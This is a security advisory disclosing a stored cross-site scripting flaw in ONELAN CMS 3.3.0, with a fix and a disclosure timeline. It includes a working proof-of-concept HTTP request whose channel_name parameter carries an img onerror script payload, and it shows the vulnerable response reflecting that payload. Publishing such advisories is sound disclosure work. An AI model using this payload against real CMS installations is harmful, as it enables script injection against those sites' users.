#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  ONELAN CMS [1]
# Vendor:   ONELAN
# CSNC ID:  CSNC-2018-006
# Subject:  Stored Cross-Site Scripting
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Stephan Sekula <stephan.sekula@compass-security.com>
# Date:     06.02.2018
#
#############################################################

Introduction:
-------------
The ONELAN Content Management System (CMS) software leverages more than a
decade of development and industry experience to deliver users a business
tool that makes creating, publishing and managing content simple and
dependable. [1]

Compass Security discovered a security flaw in the ONELAN CMS, which
allows injecting client-side code into the application.


Affected:
---------
Vulnerable:
 * CMS V3.3.0 Build 56815


Technical Description
---------------------
Users are able to edit channel names via the CMS. Manipulating the parameter
channel_name in the respective requests will lead to the manipulated contents
being included in the resulting response.

Request:
POST /channel_manager/form_edit_channel.json HTTP/1.1
Host: [CUT]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 874
Cookie: session=[CUT]; zone_properties_panel_pos=980_166; media=package
Connection: close  
publish_automatically_at_hours=0&[CUT]&
channel_name=%22%3E%3Cimg%20src%3D%22x%3Ax%22%20onerror%3D%22alert(0)%22%3E&
[CUT]&allowed_roles_mandatory=Redaktion

Response:
HTTP/1.1 302 Found
Date: Mon, 05 Feb 2018 21:24:50 GMT
Server: Apache
Set-Cookie: session=[CUT];path=/;httponly;secure;
Content-length: 823
Location: /status/channels.json?_=%271510817490.021589-31%27&retry_interval=0
Cache-Control: no-cache
Connection: close  
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Redirecting to /status/channels.json?_=%271510817490.021589-31%27&amp;
    retry_interval=0</title>
</head>
<body>
<h1>Redirecting to <a href="/status/channels.json?_=%271510817490.021589-31%27
    &amp;retry_interval=0">/status/channels.json?_=%271510817490.021589-31%27
	&amp;retry_interval=0</a></h1>
<div id="feedback">
<div id="msg_channel_manager_config_changed"
    class="local_message success_local_message status_good">
<p class="headline_message">
    Channel "><img src="x:x" onerror="alert(0)"> edited successfully</p>
</div></div>
</body>
</html>


Workaround / Fix:
-----------------
This issue can be fixed by properly encoding user-provided input when displayed
back to the user.


Timeline:
---------
2018-05-29:     Public disclosure
2018-05-28:     Release of fixed version/patch
2018-02-12:     Initial vendor response
2018-02-06:     Initial vendor notification
2018-02-06:     Discovery by Stephan Sekula


References:
-----------
[1] https://onelan.com/products/publisher-cms/